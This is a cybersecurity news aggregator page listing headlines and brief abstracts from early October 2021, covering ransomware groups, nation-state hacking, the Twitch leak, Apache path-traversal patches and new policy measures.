Some 14,000 Google users were warned of being suspected targets of Russian government-backed threat actors. Following that, the tech giant announced cybersecurity updates, particularly for the email accounts of high-profile users.Gov Info Security
October 9, 2021 – Vulnerabilities
Security expert published NMAP script for Apache CVE-2021-41773 vulnerability Full Text
Abstract
Security expert Dhiraj Mishra published an NMAP script for the CVE-2021-41773 Path Traversal vulnerability affecting Apache Web Server version 2.4.49. Security researcher Dhiraj Mishra released an NMAP script for the CVE-2021-41773 path...Security Affairs
October 9, 2021 – Attack
Attackers Encrypt VMware ESXi Server With Python Ransomware Full Text
Abstract
According to Sophos, the script contains multiple hardcoded encryption keys, and a routine for generating even more keys, which led the researchers to the conclusion that the ransomware creates a unique key at each run.Security Week
October 9, 2021 – Breach
Sky.com servers exposed via misconfiguration Full Text
Abstract
CyberNews researchers found an exposed configuration file hosted on a Sky.com subdomain containing production data. Original post @ https://cybernews.com/news/sky-com-servers-exposed-via-misconfiguration/ CyberNews researchers found an exposed...Security Affairs
October 9, 2021 – Outage
Cox Media Group took down broadcasts after a ransomware attack Full Text
Abstract
American media conglomerate Cox Media Group (CMG) was hit by a ransomware attack that took down live TV and radio broadcast streams in June 2021. The American media conglomerate Cox Media Group (CMG) announced it was hit by a ransomware attack that...Security Affairs
October 08, 2021 – Ransomware
The Week in Ransomware - October 8th 2021 - Making arrrests Full Text
Abstract
This week's big news is the arrests of two ransomware operators in Ukraine responsible for hundreds of attacks targeting organizations worldwide.BleepingComputer
October 08, 2021 – Cryptocurrency
Democrats urge federal agencies to address use of cryptocurrencies for ransomware payments Full Text
Abstract
A group of Democrats on Friday urged the Biden administration to do more to confront the growing use of cryptocurrency markets in ransomware attacks, which have become an increasing national security threat over the past year.The Hill
October 08, 2021 – Criminals
Ransomware Group FIN12 Aggressively Going After Healthcare Targets Full Text
Abstract
An "aggressive" financially motivated threat actor has been identified as linked to a string of RYUK ransomware attacks since October 2018, while maintaining close partnerships with TrickBot-affiliated threat actors and using a publicly available arsenal of tools such as Cobalt Strike Beacon payloads to interact with victim networks. Cybersecurity firm Mandiant attributed the intrusions to a Russian-speaking hacker group codenamed FIN12, and previously tracked as UNC1878, with a disproportionate focus on healthcare organizations with more than $300 million in revenue, among others, including education, financial, manufacturing, and technology sectors, located in North America, Europe, and the Asia Pacific. "FIN12 relies on partners to obtain initial access to victim environments," Mandiant researchers said. "Notably, instead of conducting multifaceted extortion, a tactic widely adopted by other ransomware threat actors, FIN12 appears to prioritize speedThe Hacker News
October 08, 2021 – Outage
Cox Media Group confirms ransomware attack that took down broadcasts Full Text
Abstract
American media conglomerate Cox Media Group (CMG) confirmed that it was hit by a ransomware attack that took down live TV and radio broadcast streams in June 2021.BleepingComputer
October 08, 2021 – Government
Biden signs bill to strengthen K-12 school cybersecurity Full Text
Abstract
President Biden on Friday signed into law legislation intended to strengthen the cybersecurity of K-12 institutions after a year in which cyberattacks aimed at schools spiked as classes moved online during the COVID-19 pandemic.The Hill
October 08, 2021 – Malware
Researchers Warn of FontOnLake Rootkit Malware Targeting Linux Systems Full Text
Abstract
Cybersecurity researchers have detailed a new campaign that likely targets entities in Southeast Asia with a previously unrecognized Linux malware that's engineered to enable remote access for its operators, in addition to amassing credentials and functioning as a proxy server. The malware family, dubbed "FontOnLake" by Slovak cybersecurity firm ESET, is said to feature "well-designed modules" that are continuously being upgraded with new features, indicating an active development phase. Samples uploaded to VirusTotal point to the possibility that the very first intrusions utilizing this threat have been happening as early as May 2020. Avast and Lacework Labs are tracking the same malware under the moniker HCRootkit. "The sneaky nature of FontOnLake's tools in combination with advanced design and low prevalence suggest that they are used in targeted attacks," ESET researcher Vladislav Hrčka said. "To collect data or conduct other malicThe Hacker News
October 08, 2021 – Phishing
Intuit warns QuickBooks customers of ongoing phishing attacks Full Text
Abstract
Intuit has warned QuickBooks customers that they are targeted by an ongoing phishing campaign impersonating the company and trying to lure potential victims with fake renewal charges.BleepingComputer
October 8, 2021 – Hacker
Atom Silo Group Eyeing Confluence Servers Full Text
Abstract
SophosLabs researchers uncovered Atom Silo, a new ransomware group almost identical to LockFile, actively exploiting an Atlassian Confluence Server and Data Center flaw. The group is using several novel techniques that make it very challenging to examine, including DLL side-loading to interrupt endpo ... Cyware Alerts - Hacker News
October 08, 2021 – Disinformation
Poll: Americans think US politicians, social media spread misinformation more than foreign governments Full Text
Abstract
The majority of Americans believe U.S. politicians and social media companies spread misinformation online more than China, Russia or other foreign governments, a poll released Friday found.The Hill
October 08, 2021 – Breach
Twitch game page backgrounds defaced with Jeff Bezos’ face Full Text
Abstract
On Twitch's website's game pages today appeared a close up of Jeff Bezos' face, in what appears to be a mysterious defacement attack.BleepingComputer
October 8, 2021 – Botnet
New Zealand CERT Warns of FluBot Using New Tricks Full Text
Abstract
The infamous FluBot banking Trojan is targeting New Zealand mobile users wherein it uses different types of text-based messaging lures regarding parcel delivery and FluBot infection alert. After a successful infection, FluBot operators use the malware to steal payment information, text messages, c ... Read MoreCyware Alerts - Hacker News
October 8, 2021 – General
58% of all nation-state attacks in the last year were launched by Russian nation-state actors Full Text
Abstract
Microsoft revealed that Russia-linked cyberespionage groups are behind the majority of the nation-state cyber attacks on US government agencies. Microsoft revealed that most of the cyber attacks on US government agencies are orchestrated by Russia-linked...Security Affairs
October 08, 2021 – Ransomware
Russian orgs heavily targeted by smaller tier ransomware gangs Full Text
Abstract
Even though American and European companies enjoy the lion's share in ransomware attacks launched from Russian ground, companies in the country aren't spared from having to deal with file encryption and double-extortion troubles.BleepingComputer
October 8, 2021 – Attack
Hydra Spreads Tentacles to Target European Banks Full Text
Abstract
MalwareHunterTeam reported a new campaign spreading Hydra banking trojan across European banking platforms, specifically customers of Germany’s second-largest financial institution. The malware uses different encryption methods to avoid detection, along with the use of Tor for communication. ... Read MoreCyware Alerts - Hacker News
October 8, 2021 – Government
The Netherlands declares war on ransomware operations Full Text
Abstract
The Dutch government will not tolerate ransomware attacks that could threaten national security, and it will use intelligence or military services to curb them. The Dutch government announced that it will not tolerate cyberattacks that pose a risk to its national...Security Affairs
October 08, 2021 – Attack
Engineering giant Weir Group hit by ransomware attack Full Text
Abstract
Scottish multinational engineering firm Weir Group has disclosed what it called an "attempted ransomware attack" that led to "significant temporary disruption" in the second half of September.BleepingComputer
October 8, 2021 – Vulnerabilities
Google Patches Four Severe Vulnerabilities in Chrome Full Text
Abstract
Google this week announced the release of an updated Chrome version for Windows, Mac, and Linux, to address a total of four high-severity security vulnerabilities in the browser.Security Week
October 8, 2021 – APT
Google warns of APT28 attack attempts against 14,000 Gmail users Full Text
Abstract
Google warned more than 14,000 Gmail users that they have been the target of nation-state spear-phishing campaigns. On Wednesday, Google announced that it had warned approximately 14,000 Gmail users that they had been targeted by nation-state hackers. Shane...Security Affairs
October 08, 2021 – General
Microsoft: Russian state hackers behind 53% of attacks on US govt agencies Full Text
Abstract
Microsoft says that Russian-sponsored hacking groups are increasingly targeting US government agencies, with roughly 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 coming from Russia.BleepingComputer
October 8, 2021 – Hacker
Update: Hackers of SolarWinds stole data on U.S. sanctions policy, intelligence probes Full Text
Abstract
The campaign alarmed officials with its stealth and careful staging. The hackers burrowed into the code production process at SolarWinds, which makes widely used software for managing networks.Reuters
October 8, 2021 – Vulnerabilities
Apache rolled out a new update in a few days to fix incomplete patch for an actively exploited flaw Full Text
Abstract
Apache Software Foundation has released HTTP Web Server 2.4.51 to completely address a vulnerability that has been actively exploited in the wild. Apache Software Foundation has released HTTP Web Server 2.4.51 to address an actively exploited path...Security Affairs
October 08, 2021 – Breach
BrewDog exposed data for over 200,000 shareholders and customers Full Text
Abstract
BrewDog, the Scottish brewery and pub chain famous for its crowd-ownership model and the tasty IPAs, has irreversibly exposed the details of 200,000 of its shareholders and customers.BleepingComputer
October 07, 2021 – Vulnerabilities
New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks Full Text
Abstract
The Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an "incomplete fix" for an actively exploited path traversal and remote code execution flaw that it patched earlier this week. CVE-2021-42013, as the new vulnerability is tracked, builds upon CVE-2021-41773, a flaw that impacted Apache web servers running version 2.4.49 and involved a path normalization bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server. Although the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the "mod_cgi" module was loaded and the configuration "require all denied" was absent, prompting Apache to issue another round of emergency updates. "It was found that the fix for CVE-2021-41773 in Apache HT...The Hacker News
October 07, 2021 – Attack
Google warns 14,000 Gmail users targeted by Russian hackers Full Text
Abstract
Google has warned about 14,000 of its users about being targeted in a state-sponsored phishing campaign from APT28, a threat group that has been linked to Russia.BleepingComputer
October 7, 2021 – Education
New ASEAN regional cybersecurity training centre opens in Singapore Full Text
Abstract
A new ASEAN regional cybersecurity training centre has opened that will see ASEAN member states work together to conduct research, share knowledge and train to respond to cyber threats.Channel News Asia
October 07, 2021 – Criminals
Russian-speaking hacking group scaling up ransomware attacks on hospitals Full Text
Abstract
A Russian-speaking cyber criminal group is disproportionately using ransomware attacks to target hospitals and health care groups across North America as the COVID-19 pandemic continues, according to new research released Thursday.The Hill
October 07, 2021 – Vulnerabilities
Code Execution Bug Affects Yamale Python Package — Used by Over 200 Projects Full Text
Abstract
A high-severity code injection vulnerability has been disclosed in 23andMe's Yamale, a schema and validator for YAML, that could be trivially exploited by adversaries to execute arbitrary Python code. The flaw, tracked as CVE-2021-38305 (CVSS score: 7.8), involves manipulating the schema file provided as input to the tool to circumvent protections and achieve code execution. Specifically, the issue resides in the schema parsing function, which allows any input passed to be evaluated and executed, resulting in a scenario where a specially-crafted string within the schema can be abused for the injection of system commands. Yamale is a Python package that allows developers to validate YAML — a data serialization language often used for writing configuration files — from the command line. The package is used by at least 224 repositories on GitHub. "This gap allows attackers that can provide an input schema file to perform Python code injection that leads to code execut...The Hacker News
October 7, 2021 – Criminals
FIN12 ransomware gang don’t implement double extortion to prioritize speed Full Text
Abstract
Researchers detailed the activities of the FIN12 ransomware group, which earned millions of dollars over the past years. Researchers from Mandiant published a detailed report on the activities of a financially motivated ransomware group tracked as FIN12...Security Affairs
October 07, 2021 – Solution
Microsoft is disabling Excel 4.0 macros by default to protect users Full Text
Abstract
Microsoft will soon begin disabling Excel 4.0 XLM macros by default in Microsoft 365 tenants to protect customers from malicious documents.BleepingComputer
October 7, 2021 – General
Microsoft: Russia Behind 58% of Detected State-Backed Hacks Full Text
Abstract
Russia accounted for most state-sponsored hacking detected by Microsoft over the past year, with a 58% share, mostly targeting government agencies and think tanks in the United States.Security Week
October 07, 2021 – Hacker
Microsoft report finds Russia dominant force behind cyberattacks in past year Full Text
Abstract
Cyberattacks originating in Russia accounted for more than half of intrusions tracked by Microsoft since mid-2020, the company said in a report released Thursday.The Hill
October 07, 2021 – Education
Penetration Testing Your AWS Environment - A CTO’s Guide Full Text
Abstract
So, you've been thinking about getting a penetration test done on your Amazon Web Services (AWS) environment. Great! What should that involve exactly? There are many options available, and knowing what you need will help you make your often limited security budget go as far as possible. Broadly, the key focus areas for most penetration tests involving AWS are: your externally accessible cloud infrastructure; any application(s) you're building or hosting; your internal cloud infrastructure; your AWS configuration itself; and secrets management. We'll look at each one, starting with the most important: external infrastructure. The good news here is that, by default, AWS does its best to help you stay secure. For example, the default security groups don't let your EC2 instances receive communication from the outside world unless you actively specify it by adding additional rules. That said, AWS still allows you plenty of rope to hang yourself with if you're not carefu...The Hacker News
October 7, 2021 – Vulnerabilities
PoC exploit for 2 flaws in Dahua cameras leaked online Full Text
Abstract
A proof of concept exploit for two authentication bypass vulnerabilities in Dahua cameras is available online; users are advised to apply updates immediately. Experts warn of the availability of proof of concept (PoC) exploit code for a couple...Security Affairs
October 07, 2021 – Vulnerabilities
Apache emergency update fixes incomplete patch for exploited bug Full Text
Abstract
Apache Software Foundation has released HTTP Web Server 2.4.51 after researchers discovered that a previous security update didn't correctly fix an actively exploited vulnerability.BleepingComputer
October 7, 2021 – Business
Gretel AI raises $50M for a platform that provides synthetic datasets to ensure privacy of actual data Full Text
Abstract
Anthos Capital is leading the round with Section 32 also participating alongside Greylock and Moonshots Capital. Greylock led the company’s previous round in 2020. It has raised $65.5 million to date.TechCrunch
October 07, 2021 – Government
New U.S. Government Initiative Holds Contractors Accountable for Cybersecurity Full Text
Abstract
The U.S. government on Wednesday announced the formation of a new Civil Cyber-Fraud Initiative that aims to hold contractors accountable for failing to meet required cybersecurity requirements in order to safeguard public sector information and infrastructure. "For too long, companies have chosen silence under the mistaken belief that it is less risky to hide a breach than to bring it forward and to report it," said Deputy Attorney General Monaco in a press statement. "Well that changes today, [and] we will use our civil enforcement tools to pursue companies, those who are government contractors who receive federal funds, when they fail to follow required cybersecurity standards — because we know that puts all of us at risk." The Civil Cyber-Fraud Initiative is part of the U.S. Justice Department's (DoJ) efforts to build resilience against cybersecurity intrusions and holding companies to task for deliberately providing deficient cybersecurity products or...The Hacker News
October 7, 2021 – Breach
Twitch data breach updates: login credentials or card numbers not exposed Full Text
Abstract
An anonymous individual has leaked the source code and data of the popular video streaming platform Twitch via a torrent file posted on 4chan. An anonymous 4chan user has published a torrent link to a 128GB file on the 4chan discussion board, the leaked...Security Affairs
October 07, 2021 – Attack
FIN12 hits healthcare with quick and focused ransomware attacks Full Text
Abstract
While most ransomware actors spend time on the victim network looking for important data to steal, one group favors quick malware deployment against sensitive, high-value targets.BleepingComputer
October 7, 2021 – Vulnerabilities
Cisco Patches High-Severity Vulnerabilities in Security Appliances, Business Switches Full Text
Abstract
Cisco this week released patches for multiple high-severity vulnerabilities affecting its Web Security Appliance (WSA), Intersight Virtual Appliance, Small Business 220 switches, and other products.Security Week
October 07, 2021 – General
Apple now requires all apps to make it easy for users to delete their accounts Full Text
Abstract
All third-party iOS, iPadOS, and macOS apps that allow users to create an account should also provide a method for terminating their accounts from within the apps beginning next year, Apple said on Wednesday. "This requirement applies to all app submissions starting January 31, 2022," the iPhone maker said, urging developers to "review any laws that may require you to maintain certain types of data, and to make sure your app clearly explains what data your app collects, how it collects that data, all uses of that data, your data retention/deletion policies." While the feature could be convenient, it's worth noting that Apple only says the mechanism should have a provision for users to "initiate deletion of their account from within the app," meaning it's possible that apps could redirect users to a website or prompt them to send an email in order to actually purge their information. The reminder follows updates to App Store Review Guideline...The Hacker News
October 7, 2021 – APT
Operation GhostShell: MalKamak APT targets aerospace and telco firms Full Text
Abstract
Operation GhostShell: Threat actors used ShellClient malware in cyberespionage campaigns aimed at companies in the aerospace and telecommunications sectors. Cybereason Nocturnus...Security Affairs
October 07, 2021 – Malware
Vidar stealer abuses Mastodon to silently get C2 configuration Full Text
Abstract
The Vidar stealer has returned in a new campaign that abuses the Mastodon social media network to get C2 configuration without raising alarms.BleepingComputer
October 7, 2021 – Disinformation
No, there isn’t proof that the private data of 1.5 billion Facebook users is being sold by hackers. Full Text
Abstract
The claim of the breach came from an anonymous account on a hacking forum that, according to Vice, obtained access to the database from a supposed company called “X2Emails.”New York Times
October 07, 2021 – Business
Firefox now shows ads as sponsored address bar suggestions Full Text
Abstract
Mozilla is now showing ads in the form of sponsored Firefox contextual suggestions when U.S. users type in the URL address bar.BleepingComputer
October 7, 2021 – Ransomware
Roundup of ransomware in the CIS Full Text
Abstract
Although there are different vectors of malware distribution, most of the current crop of ransomware threats targeting businesses in the CIS penetrate the victim’s network via RDP.Kaspersky Labs
October 07, 2021 – Vulnerabilities
Microsoft fixes bug blocking Azure Virtual Desktops security updates Full Text
Abstract
Microsoft has fixed a bug blocking some Azure Virtual Desktop (AVD) devices from downloading and installing monthly security updates via Windows Server Update Services (WSUS) since early July.BleepingComputer
October 7, 2021 – Education
Cybersecurity best practices lagging, despite people being aware of the risks Full Text
Abstract
According to a report by the National Cybersecurity Alliance and CybSafe, public response to and implementation of commonly known best practices, including strong passwords, MFA and others, are tepid at best.Help Net Security
October 07, 2021 – Vulnerabilities
Unpatched Dahua cams vulnerable to unauthenticated remote access Full Text
Abstract
Unpatched Dahua cameras are prone to two authentication bypass vulnerabilities, and a proof of concept exploit that came out today makes the case for upgrading pressing.BleepingComputer
October 07, 2021 – Breach
Twitch: No credentials or card numbers exposed in data breach Full Text
Abstract
Twitch says that no login credentials and credit card numbers belonging to users or streamers were exposed following yesterday's massive data leak.BleepingComputer
October 6, 2021 – Vulnerabilities
Canopy Parental Control App Wide Open to Unpatched XSS Bugs Full Text
Abstract
The possible cyberattacks include disabling monitoring, location-tracking of children and malicious redirects of parent-console users.Threatpost
October 6, 2021 – Malware
ESPecter Bootkit Malware Haunts Victims with Persistent Espionage Full Text
Abstract
The rare UEFI bootkit drops a fully featured backdoor on PCs and gains the ultimate persistence by modifying the Windows Boot Manager.Threatpost
October 6, 2021 – Breach
Twitch Gets Gutted: All Source Code Leaked Full Text
Abstract
An anonymous user posted a link to a 125GB torrent to 4chan yesterday, containing all of Twitch’s source code, comments going back to its inception and more.Threatpost
October 06, 2021 – Breach
Twitch Suffers Massive 125GB Data and Source Code Leak Due to Server Misconfiguration Full Text
Abstract
Interactive livestreaming platform Twitch acknowledged a "breach" after an anonymous poster on the 4chan messaging board leaked its source code, an unreleased Steam competitor from Amazon Game Studios, details of creator payouts, proprietary software development kits, and other internal tools. The Amazon-owned service said it's "working with urgency to understand the extent of this," adding the data was exposed "due to an error in a Twitch server configuration change that was subsequently accessed by a malicious third party." "At this time, we have no indication that login credentials have been exposed," Twitch noted in a post published late Wednesday. "Additionally, full credit card numbers are not stored by Twitch, so full credit card numbers were not exposed." The forum user claimed the hack is designed to "foster more disruption and competition in the online video streaming space" because "their communi...The Hacker News
October 06, 2021 – Education
Cyber Security WEBINAR — How to Ace Your InfoSec Board Deck Full Text
Abstract
Communication is a vital skill for any leader at an organization, regardless of seniority. For security leaders, this goes double. Communicating clearly works on multiple levels. On the one hand, security leaders and CISOs must be able to communicate strategies clearly – instructions, incident response plans, and security policies. On the other, they must be able to communicate the importance of security and the value of having robust defenses to the C-level. For CISOs and other security leaders, this latter skill is crucial but often overlooked or not prioritized. A new webinar, "How to ace your Infosec board deck," looks to shed light on both the importance of being able to communicate clearly with management, and key strategies to do so effectively. The webinar will feature a conversation with vCISO and Cybersecurity Consultant Dr. Eric Cole, as well as Norwest Venture Partners General Partner Dave Zilberman. More so than just talking about the dollar value of a sec...The Hacker News
October 06, 2021 – Government
U.S. govt to sue contractors who hide breach incidents Full Text
Abstract
Under the new Civil Cyber-Fraud Initiative that the U.S. Department of Justice announced today, government contractors are accountable in a civil court if they don't report a breach or fail to meet required cybersecurity standards.BleepingComputer
October 6, 2021 – Outage
Attackers had Access to OSF HealthCare’s IT Systems for Six Weeks Before Outage Full Text
Abstract
The patient information exposed by the incident included names, birthdates, Social Security numbers, treatment details, prescription details, and health insurance details.Becker’s Health IT Review
October 06, 2021 – General
Lawmakers advocate for establishment of standalone House and Senate cyber panels Full Text
Abstract
Lawmakers on both sides of the aisle Wednesday argued for the need to establish standalone cybersecurity committees in the House and Senate to address mounting threats and streamline an increasingly bogged down process to approve legislation.The Hill
October 06, 2021 – Hacker
Iranian Hackers Abuse Dropbox in Cyberattacks Against Aerospace and Telecom Firms Full Text
Abstract
Details have emerged about a new cyber espionage campaign directed against the aerospace and telecommunications industries, primarily in the Middle East, with the goal of stealing sensitive information about critical assets, organizations' infrastructure, and technology while remaining in the dark and successfully evading security solutions. Boston-based cybersecurity company Cybereason dubbed the attacks "Operation Ghostshell," pointing out the use of a previously undocumented and stealthy remote access trojan (RAT) called ShellClient that's deployed as the main spy tool of choice. The first sign of the attacks was observed in July 2021 against a handpicked set of victims, indicating a highly targeted approach. "The ShellClient RAT has been under ongoing development since at least 2018, with several iterations that introduced new functionalities, while it evaded antivirus tools and managed to remain undetected and publicly unknown," researchers Tom Fak...The Hacker News
October 6, 2021 – Hacker
Exclusive: Researchers dumped Gigabytes of data from Agent Tesla C2Cs Full Text
Abstract
Resecurity researchers dumped gigabytes of data from Agent Tesla C2Cs; one of the most well-known cyberespionage tools suffers a data leak. Agent Tesla, first discovered in late 2014, is an extremely popular "malware-as-a-service" Remote Access...Security Affairs
October 06, 2021 – Hacker
Hackers use stealthy ShellClient malware on aerospace, telco firms Full Text
Abstract
Threat researchers investigating malware used to target companies in the aerospace and telecommunications sectors discovered a new threat actor that has been running cyber espionage campaigns since at least 2018.BleepingComputer
October 6, 2021 – Business
Blackstone-backed Patria creates Latam cybersecurity platform, eyes IPO Full Text
Abstract
Brazilian asset manager Patria Investments Ltd has acquired cybersecurity companies Neosecure and Proteus to create the largest information security platform in Latin America, it said on Tuesday.Reuters
October 06, 2021 – Government
Bill requiring companies report cyber incidents moves forward in the Senate Full Text
Abstract
The Senate Homeland Security and Governmental Affairs Committee on Wednesday approved legislation to require many companies to report both major cybersecurity breaches and payments made related to ransomware attacks.The Hill
October 06, 2021 – Solution
Google to turn on 2-factor authentication by default for 150 million users Full Text
Abstract
Google has announced plans to automatically enroll about 150 million users into its two-factor authentication scheme by the end of the year as part of its ongoing efforts to prevent unauthorized access to accounts and improve security. In addition, the internet giant said it also intends to require 2 million YouTube creators to switch on the setting, which it calls two-step verification (2SV), to protect their channels from potential takeover attacks. "2SV is strongest when it combines both 'something you know' (like a password) and 'something you have' (like your phone or a security key)," Google's AbdelKarim Mardini and Guemmy Kim said in a post, adding "having a second form of authentication dramatically decreases an attacker's chance of gaining access to an account." The rollout follows the company's proposals to beef up account sign-ins earlier this May, when it said it intends to "automatically enrolling users in 2SV i...The Hacker News
October 6, 2021 – Breach
Twitch source code and sensitive data leaked online Full Text
Abstract
An anonymous individual has leaked the source code and data of the popular video streaming platform Twitch via a torrent file posted on 4chan. An anonymous individual has leaked online the source code and streamers and users data of the popular video...Security Affairs
October 06, 2021 – Vulnerabilities
Actively exploited Apache 0-day also allows remote code execution Full Text
Abstract
Proof-of-Concept (PoC) exploits for the Apache web server zero-day surfaced on the internet revealing that the vulnerability is far more critical than originally disclosed. These exploits show that the scope of the vulnerability transcends path traversal, allowing attackers remote code execution (RCE) abilities.BleepingComputer
October 6, 2021 – General
What’s in a Threat Group Name? An Inside Look at the Intricacies of Nation-State Attribution Full Text
Abstract
Different researchers may see similar activity clusters at the same time, but because of their limited visibility, may be unaware that other researchers are going through the same process.Security Week
October 06, 2021 – Attack
Twitch hack allegedly includes source code and earnings for streamers Full Text
Abstract
Online video game streaming service Twitch suffered a hack on Wednesday that leaked source code, user payouts and earnings for streamers, The Wall Street Journal reported.The Hill
October 06, 2021 – Vulnerabilities
Multiple Critical Flaws Discovered in Honeywell Experion PKS and ACE Controllers Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released an advisory regarding multiple security vulnerabilities affecting all versions of Honeywell Experion Process Knowledge System C200, C200E, C300, and ACE controllers that could be exploited to achieve remote code execution and denial-of-service (DoS) conditions. "A Control Component Library (CCL) may be modified by a bad actor and loaded to a controller such that malicious code is executed by the controller," Honeywell noted in an independent security notification published earlier this February. Credited with discovering and reporting the flaws are Rei Henigman and Nadav Erez of industrial cybersecurity firm Claroty. Experion Process Knowledge System (PKS) is a distributed control system (DCS) that's designed to control large industrial processes spanning a variety of sectors ranging from petrochemical refineries to nuclear power plants where high reliability and security is imp...The Hacker News
October 6, 2021 – Government
Arizona governor announces the launch of Command Center to protect state computer systems Full Text
Abstract
The governor of Arizona, Doug Ducey, has announced the launch of a Cyber Command Center to address the thousands of attacks that daily target government computers. The governor of Arizona, Doug Ducey, has launched a Cyber Command Center to repel the huge...Security Affairs
October 06, 2021 – Vulnerabilities
Medtronic urgently recalls insulin pump controllers over hacking concerns Full Text
Abstract
Medtronic is urgently recalling remote controllers for insulin pumps belonging to its 'MiniMed Paradigm' family of products, due to potential cybersecurity risks.BleepingComputer
October 6, 2021 – General
One in three IT security managers don’t have a formal cybersecurity incident response plan Full Text
Abstract
Regardless of industry, information security incidents have become more of a targeted threat for businesses, increasing in amount and efficacy, according to the 2021 Data Security Report from GetApp.Help Net Security
October 06, 2021 – Policy and Law
TSA to issue regulations to secure rail, aviation groups against cyber threats Full Text
Abstract
The Transportation Security Administration (TSA) will soon issue regulations to further secure rail transit and airline companies against cyber threats, Homeland Security Secretary Alejandro Mayorkas announced Wednesday.The Hill
October 6, 2021 – Breach
UK newspaper The Telegraph exposed a 10TB database with subscriber data Full Text
Abstract
The UK media outlet The Telegraph has leaked 10 TB of subscriber data after failing to properly secure one of its databases. The UK newspaper The Telegraph, one of the UK's largest newspapers and online media outlets, has leaked 10 TB of data...Security Affairs
October 06, 2021 – Breach
Massive Twitch hack: Source code and payment reports leaked Full Text
Abstract
Twitch source code, as well as streamers' and users' sensitive information, was allegedly leaked online by an anonymous user on the 4chan imageboard.BleepingComputer
October 6, 2021 – Breach
US Clothing Brand Next Level Apparel Reports Phishing-related Data Breach Full Text
Abstract
Next Level Apparel, a wholesale producer and online retailer of blank apparel, said it “could not confirm that any individual's information was in fact viewed by an unauthorized person”.The Daily Swig
October 06, 2021 – Government
DOJ to go after government contractors that fail to report breaches Full Text
Abstract
The Department of Justice (DOJ) said Wednesday it will go after federal contractors that fail to report cybersecurity incidents to the U.S. government.The Hill
October 6, 2021 – Attack
LANtenna attack allows exfiltrating data from Air-Gapped systems via Ethernet cables Full Text
Abstract
Boffins devised a new technique, dubbed LANtenna, to exfiltrate data from systems in air-gapped networks using Ethernet cables as a "transmitting antenna." Security researchers from the Cyber Security Research Center in the Ben Gurion University...Security Affairs
October 06, 2021 – Solution
Microsoft shares Windows 11 TPM check bypass for unsupported PCs Full Text
Abstract
Microsoft has published a new support webpage where they provide an official method to bypass the TPM 2.0 and CPU checks (TPM 1.2 is still required) and have Windows 11 installed on unsupported systems.BleepingComputer
October 6, 2021 – Malware
Mana Tools: A Malware C2 Panel with a Past Full Text
Abstract
Mana Tools was first reported in 2019 by Yoroi researchers who identified it as a fork of the AzoRult 3.2 malware created by a Pakistani actor named Aqib Waseem, better known as Hagga.Risk IQ
October 06, 2021 – Solution
Firefox improves advertising tracker blocking in private browsing Full Text
Abstract
Mozilla says that Firefox users will be better protected from advertising trackers (like Google Analytics scripts) while browsing the Internet in Private Browsing mode and using Strict Tracking Protection.BleepingComputer
October 6, 2021 – Government
FDA: How to Inform Patients About Medical Device Cyber Flaws Full Text
Abstract
These devices range from Software as a Medical Device, such as certain mobile phone applications, to implantable medical devices, such as pacemakers, the federal agency notes.Gov Info Security
October 06, 2021 – Policy and Law
Ransom Disclosure Act would give victims 48 hours to report payments Full Text
Abstract
Victims of ransomware attacks in the United States may soon have to report any payments to hackers within 48 hours, as required by a new legislative proposal titled the 'Ransom Disclosure Act'.BleepingComputer
October 6, 2021 – General
ATO attacks increased 307% between 2019 and 2021 Full Text
Abstract
A new report released by Sift revealed a staggering 307% increase in ATO attacks between April 2019—shortly after many COVID-19 stay-at-home orders were enacted—and June 2021.Help Net Security
October 06, 2021 – Attack
Fired IT admin revenge-hacks school by wiping data, changing passwords Full Text
Abstract
A 29-year-old wiped data on systems of a secondary school in the U.K. and changed the passwords at an IT company, in retaliatory cyber attacks for being fired.BleepingComputer
October 6, 2021 – Phishing
Chase Bank Heavily Targeted Via XBALTI Phishing Kit Full Text
Abstract
During the three months from mid-May to mid-August 2021, Cyren researchers detected a 300% increase in phishing URLs and kits within their own telemetry targeting Chase Bank.Security Week
October 5, 2021 – Vulnerabilities
IP Surveillance Bugs in Axis Gear Allow RCE, Data Theft Full Text
Abstract
Three security vulnerabilities in Axis video products could open up the door to a bevy of different cyberattacks on businesses.Threatpost
October 5, 2021 – Vulnerabilities
Apache Web Server Zero-Day Exposes Sensitive Data Full Text
Abstract
The open-source project has rolled out a security fix for CVE-2021-41773, for which public cyberattack exploit code is circulating.Threatpost
October 5, 2021 – Outage
Facebook Blames Outage on Faulty Router Configuration Full Text
Abstract
One easily disproved conspiracy theory linked the ~six-hour outage to a supposed data breach tied to a Sept. 22 hacker forum ad for 1.5B Facebook user records.Threatpost
October 5, 2021 – Cryptocurrency
Oops! Compound DeFi Platform Gives Out $90M, Would Like it Back, Please Full Text
Abstract
The Compound cryptocurrency exchange accidentally botched a platform upgrade and distributed millions in free COMP tokens to users – then threatened to dox the recipients.Threatpost
October 05, 2021 – Business
Google to auto-enroll 150 million user accounts into 2FA Full Text
Abstract
Google announced today that they plan on auto-enrolling 150 million accounts into two-factor authentication by the end of 2021.BleepingComputer
October 5, 2021 – Malware
FinFisher is One of the Stealthiest Malware: Kaspersky Full Text
Abstract
Kaspersky laid bare an eight-month-long investigation into FinSpy operations, revealing multiple insights about the new upgrades in the spyware. Using bootkits, attackers are able to control operating systems' boot process and disable the defenses by evading the Secure Boot mechanism of the sys ... Read MoreCyware Alerts - Hacker News
October 05, 2021 – Government
NSA director expects to be facing ransomware attacks ‘every single day’ in five years Full Text
Abstract
National Security Agency (NSA) Director Paul Nakasone predicted Tuesday that the rate of ransomware attacks will not slow down in the next five years, and said efforts to counter those threats must remain constant as well.The Hill
October 05, 2021 – Malware
Researchers Discover UEFI Bootkit Targeting Windows Computers Since 2012 Full Text
Abstract
